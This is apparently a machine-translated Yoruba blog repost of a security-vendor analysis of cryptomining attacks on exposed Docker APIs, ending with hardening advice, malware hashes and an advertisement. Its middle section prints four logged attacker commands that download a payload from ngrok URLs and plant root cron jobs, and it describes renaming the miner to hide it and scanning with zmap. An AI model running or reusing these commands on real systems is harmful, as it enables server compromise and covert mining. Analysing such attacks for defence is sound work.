ProHoster > Блог > Isakoso > Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency

A ṣe itupalẹ awọn data ti a gba ni lilo awọn apoti oyin, eyiti a ṣẹda lati tọpa awọn irokeke. Ati pe a rii iṣẹ ṣiṣe pataki lati aifẹ tabi awọn oniwakusa cryptocurrency ti a ko fun ni aṣẹ bi awọn apoti rogue nipa lilo aworan ti a tẹjade ni agbegbe lori Ipele Docker. Aworan naa ni a lo gẹgẹbi apakan ti iṣẹ kan ti o ngba awọn awakusa cryptocurrency irira.

Ni afikun, awọn eto fun ṣiṣẹ pẹlu awọn nẹtiwọọki ti fi sori ẹrọ lati wọ inu awọn apoti agbegbe ti o ṣii ati awọn ohun elo.

A fi awọn apoti oyin wa silẹ bi o ṣe jẹ, iyẹn ni, pẹlu awọn eto aiyipada, laisi eyikeyi awọn igbese aabo tabi fifi sori ẹrọ sọfitiwia atẹle. Jọwọ ṣe akiyesi pe Docker ni awọn iṣeduro fun iṣeto akọkọ lati yago fun awọn aṣiṣe ati awọn ailagbara ti o rọrun. Ṣugbọn awọn apoti oyin ti a lo jẹ awọn apoti, ti a ṣe apẹrẹ lati ṣe awari awọn ikọlu ti a pinnu si pẹpẹ apoti, kii ṣe awọn ohun elo inu awọn apoti.

Iṣẹ ṣiṣe irira ti a rii tun jẹ akiyesi nitori ko nilo awọn ailagbara ati pe o tun jẹ ominira ti ẹya Docker. Wiwa atunto ti ko tọ, ati nitorinaa ṣiṣi, aworan eiyan ni gbogbo ohun ti awọn ikọlu nilo lati ṣe akoran ọpọlọpọ awọn olupin ṣiṣi.

Docker API ti a ko tii gba olumulo laaye lati ṣe ọpọlọpọ ibiti o ti awọn ẹgbẹ, pẹlu gbigba atokọ ti awọn apoti ti nṣiṣẹ, gbigba awọn akọọlẹ lati inu eiyan kan, bẹrẹ, idaduro (pẹlu fi agbara mu) ati paapaa ṣiṣẹda eiyan tuntun lati aworan kan pato pẹlu awọn eto pato.

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency
Ni apa osi ni ọna ifijiṣẹ malware. Ni apa ọtun ni agbegbe ikọlu, eyiti o fun laaye lati yiyi awọn aworan latọna jijin.

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency
Pipin nipasẹ orilẹ-ede ti 3762 ṣiṣi Docker APIs. Da lori wiwa Shodan ti ọjọ 12.02.2019/XNUMX/XNUMX

Attack pq ati payload awọn aṣayan

Iṣẹ irira ni a rii kii ṣe pẹlu iranlọwọ ti awọn ikoko oyin nikan. Awọn data lati Shodan fihan pe nọmba awọn API Docker ti o han (wo aworan keji) ti pọ si lati igba ti a ṣe iwadii eiyan ti a ko ṣeto ti a lo bi afara lati mu sọfitiwia iwakusa cryptocurrency Monero ṣiṣẹ. Ni Oṣu Kẹwa ọdun to kọja (2018, data lọwọlọwọ o le wo bi eleyi isunmọ. onitumọ) Awọn API ti o ṣi silẹ nikan ni 856.

Ayẹwo ti awọn iwe oyin ikoko fihan pe lilo aworan eiyan tun ni nkan ṣe pẹlu lilo ngrok, Ohun elo kan fun idasile awọn asopọ to ni aabo tabi gbigbe awọn ijabọ lati awọn aaye wiwọle si gbangba si awọn adirẹsi tabi awọn orisun ti o kan pato (fun apẹẹrẹ localhost). Eyi ngbanilaaye awọn ikọlu lati ṣẹda awọn URL ni agbara nigba jiṣẹ fifuye isanwo si olupin ṣiṣi. Ni isalẹ wa awọn apẹẹrẹ koodu lati awọn akọọlẹ ti n ṣafihan ilokulo ti iṣẹ ngrok:

Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,

Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”

Bi o ti le rii, awọn faili ti o gbejade ti wa ni igbasilẹ lati awọn URL iyipada nigbagbogbo. Awọn URL wọnyi ni ọjọ ipari kukuru, nitorinaa awọn ẹru isanwo ko le ṣe igbasilẹ lẹhin ọjọ ipari.

Awọn aṣayan isanwo meji wa. Akọkọ jẹ miner ELF kan ti a ṣajọpọ fun Lainos (ti a ṣalaye bi Coinminer.SH.MALXMR.ATNO) ti o sopọ si adagun iwakusa. Ẹlẹẹkeji jẹ iwe afọwọkọ (TrojanSpy.SH.ZNETMAP.A) ti a ṣe lati gba awọn irinṣẹ nẹtiwọki kan ti a lo lati ṣayẹwo awọn sakani nẹtiwọki ati lẹhinna wa awọn ibi-afẹde tuntun.

Iwe afọwọkọ dropper ṣeto awọn oniyipada meji, eyiti a lo lẹhinna lati ran miner cryptocurrency ṣiṣẹ. Oniyipada HOST ni URL nibiti awọn faili irira wa, ati oniyipada RIP ni orukọ faili (ni otitọ, hash) ti miner lati gbe lọ. Oniyipada HOST yipada ni gbogbo igba ti oniyipada hash ba yipada. Iwe afọwọkọ naa tun gbiyanju lati ṣayẹwo pe ko si awọn miners cryptocurrency miiran ti nṣiṣẹ lori olupin ti o kọlu.

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency
Awọn apẹẹrẹ ti HOST ati awọn oniyipada RIP, bakanna bi snippet koodu kan ti a lo lati ṣayẹwo pe ko si awọn awakusa miiran ti nṣiṣẹ

Ṣaaju ki o to bẹrẹ miner, o ti wa ni lorukọmii si nginx. Awọn ẹya miiran ti iwe afọwọkọ yii tunrukọ miner si awọn iṣẹ abẹle miiran ti o le wa ni awọn agbegbe Linux. Eyi nigbagbogbo to lati fori awọn sọwedowo lodi si atokọ ti awọn ilana ṣiṣe.

Iwe afọwọkọ wiwa tun ni awọn ẹya ara ẹrọ. O ṣiṣẹ pẹlu iṣẹ URL kanna lati ran awọn irinṣẹ pataki lọ. Lara wọn ni alakomeji zmap, eyiti o lo lati ṣe ọlọjẹ awọn nẹtiwọọki ati gba atokọ ti awọn ebute oko oju omi ṣiṣi. Iwe afọwọkọ naa tun gbe alakomeji miiran ti o lo lati ṣe ajọṣepọ pẹlu awọn iṣẹ ti a rii ati gba awọn asia lati ọdọ wọn lati pinnu alaye afikun nipa iṣẹ ti a rii (fun apẹẹrẹ, ẹya rẹ).

Iwe afọwọkọ naa tun ṣe ipinnu diẹ ninu awọn sakani nẹtiwọọki lati ṣe ọlọjẹ, ṣugbọn eyi da lori ẹya ti iwe afọwọkọ naa. O tun ṣeto awọn ebute oko oju omi lati awọn iṣẹ-ninu ọran yii, Docker-ṣaaju ṣiṣe ọlọjẹ naa.

Ni kete bi awọn ibi-afẹde ti ṣee ṣe, awọn asia yoo yọkuro laifọwọyi lati ọdọ wọn. Iwe afọwọkọ naa tun ṣe asẹ awọn ibi-afẹde ti o da lori awọn iṣẹ, awọn ohun elo, awọn paati tabi awọn iru ẹrọ iwulo: Redis, Jenkins, Drupal, MODX, Kubernetes Titunto, Docker 1.16 onibara ati Apache CouchDB. Ti olupin ti ṣayẹwo ba baamu eyikeyi ninu wọn, o ti fipamọ sinu faili ọrọ, eyiti awọn ikọlu le lo nigbamii fun itupalẹ atẹle ati gige sakasaka. Awọn faili ọrọ wọnyi jẹ ikojọpọ si olupin awọn ikọlu nipasẹ awọn ọna asopọ ti o ni agbara. Iyẹn ni, URL ọtọtọ ni a lo fun faili kọọkan, eyiti o tumọ si pe iraye si atẹle le nira.

Fekito ikọlu jẹ aworan Docker, bi a ṣe le rii ninu awọn ege koodu meji atẹle.

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency
Ni oke ti wa ni lorukọmii si iṣẹ ti o tọ, ati ni isalẹ ni bii zmap ṣe lo lati ṣe ọlọjẹ awọn nẹtiwọọki

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency
Ni oke ni awọn sakani nẹtiwọọki ti a ti sọ tẹlẹ, ni isalẹ wa awọn ebute oko oju omi kan pato fun wiwa awọn iṣẹ, pẹlu Docker

Bii Docker API ti kii ṣe ohun-ini ati awọn aworan ti gbogbo eniyan lati agbegbe ti wa ni lilo kaakiri awọn awakusa cryptocurrency
Sikirinifoto fihan pe aworan alpine-curl ti ṣe igbasilẹ diẹ sii ju awọn akoko 10 milionu lọ

Da lori Alpine Linux ati curl, ohun elo CLI daradara-daradara fun gbigbe awọn faili lori ọpọlọpọ awọn ilana, o le kọ Docker aworan. Gẹgẹbi o ti le rii ninu aworan ti tẹlẹ, aworan yii ti ṣe igbasilẹ tẹlẹ diẹ sii ju awọn akoko miliọnu mẹwa 10 lọ. Nọmba nla ti awọn igbasilẹ le tumọ si lilo aworan yii bi aaye titẹsi; aworan yii ti ni imudojuiwọn diẹ sii ju oṣu mẹfa sẹhin; awọn olumulo ko ṣe igbasilẹ awọn aworan miiran lati ibi ipamọ yii nigbagbogbo. Ni Docker ojuami ti titẹsi - eto awọn ilana ti a lo lati tunto eiyan kan lati ṣiṣẹ. Ti awọn eto aaye titẹ sii ko tọ (fun apẹẹrẹ, apoti naa ti wa ni ṣiṣi silẹ lati Intanẹẹti), aworan le ṣee lo bi ikọlu ikọlu. Awọn ikọlu le lo lati fi ẹru isanwo ranṣẹ ti wọn ba rii atunto aiṣedeede tabi apoti ṣiṣi silẹ ti ko ni atilẹyin.

O ṣe pataki lati ṣe akiyesi pe aworan yii (alpine-curl) funrararẹ kii ṣe irira, ṣugbọn bi o ti le rii loke, o le ṣee lo lati ṣe awọn iṣẹ irira. Awọn aworan Docker ti o jọra tun le ṣee lo lati ṣe awọn iṣẹ irira. A kan si Docker ati ṣiṣẹ pẹlu wọn lori ọran yii.

Awọn iṣeduro

Eto ti ko tọ ku ibakan isoro fun ọpọlọpọ awọn ile-iṣẹ, paapaa awọn imuse DevOps, lojutu lori idagbasoke iyara ati ifijiṣẹ. Ohun gbogbo ti buru si nipasẹ iwulo lati ni ibamu pẹlu iṣatunṣe ati awọn ofin ibojuwo, iwulo lati ṣe atẹle aṣiri data, bakanna bi ibajẹ nla lati ibamu wọn. Ṣafikun adaṣe aabo sinu igbesi-aye idagbasoke kii ṣe iranlọwọ nikan fun ọ lati wa awọn iho aabo ti o le bibẹẹkọ lọ lairi, ṣugbọn o tun ṣe iranlọwọ fun ọ lati dinku iṣẹ ṣiṣe ti ko wulo, gẹgẹbi ṣiṣe awọn iṣelọpọ sọfitiwia afikun fun ailagbara awari kọọkan tabi aiṣedeede lẹhin ti o ti gbe ohun elo kan lọ.

Iṣẹlẹ ti a jiroro ninu nkan yii ṣe afihan iwulo lati ṣe akiyesi aabo lati ibẹrẹ, pẹlu awọn iṣeduro wọnyi:

  • Fun awọn alabojuto eto ati awọn olupilẹṣẹ: Nigbagbogbo ṣayẹwo awọn eto API rẹ lati rii daju pe ohun gbogbo wa ni atunto lati gba awọn ibeere nikan lati ọdọ olupin kan tabi nẹtiwọọki inu.
  • Tẹle ilana ti awọn ẹtọ ti o kere julọ: rii daju pe awọn aworan eiyan ti fowo si ati rii daju, fi opin si iraye si awọn paati pataki (iṣẹ ifilọlẹ apoti) ati ṣafikun fifi ẹnọ kọ nkan si awọn asopọ nẹtiwọọki.
  • Tẹle awọn iṣeduro ati ki o jeki aabo siseto, f.eks. lati Docker ati-itumọ ti aabo awọn ẹya ara ẹrọ.
  • Lo iṣayẹwo adaṣe adaṣe ti awọn akoko asiko ati awọn aworan lati gba alaye ni afikun nipa awọn ilana ti n ṣiṣẹ ninu apo eiyan (fun apẹẹrẹ, lati ṣawari rirọ tabi wa awọn ailagbara). Iṣakoso ohun elo ati ibojuwo iduroṣinṣin ṣe iranlọwọ lati tọpa awọn ayipada ajeji si awọn olupin, awọn faili, ati awọn agbegbe eto.

Trendmicro ṣe iranlọwọ fun awọn ẹgbẹ DevOps lati kọ ni aabo, yi jade ni iyara, ati ṣe ifilọlẹ nibikibi. Trend Micro arabara awọsanma Aabo Pese alagbara, ṣiṣan, ati aabo adaṣe kọja opo gigun ti epo DevOps ti agbari ati pese awọn aabo irokeke lọpọlọpọ XGen lati daabobo awọn iṣẹ ṣiṣe ti ara, foju ati awọsanma ni akoko asiko. O tun ṣe afikun aabo eiyan pẹlu Aabo ti o jinlẹ и Jin Aabo Smart Ṣayẹwo, eyiti o ṣayẹwo awọn aworan apoti Docker fun malware ati awọn ailagbara ni aaye eyikeyi ninu opo gigun ti idagbasoke lati ṣe idiwọ awọn irokeke ṣaaju ki wọn to lọ.

Awọn ami adehun

Awọn hashes ti o jọmọ:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

Ni Docker fidio dajudaju Awọn agbọrọsọ adaṣe ṣe afihan kini awọn eto ti o nilo lati ṣe ni akọkọ lati le dinku iṣeeṣe tabi yago fun iṣẹlẹ ti ipo ti ṣalaye loke. Ati ni Oṣu Kẹjọ ọjọ 19-21 ni aladanla lori ayelujara Awọn irinṣẹ DevOps&Iyanjẹ O le jiroro awọn wọnyi ati awọn iṣoro aabo ti o jọra pẹlu awọn ẹlẹgbẹ ati awọn olukọ adaṣe ni tabili yika, nibiti gbogbo eniyan le sọ jade ati tẹtisi awọn irora ati awọn aṣeyọri ti awọn ẹlẹgbẹ ti o ni iriri.

orisun: www.habr.com

Fi ọrọìwòye kun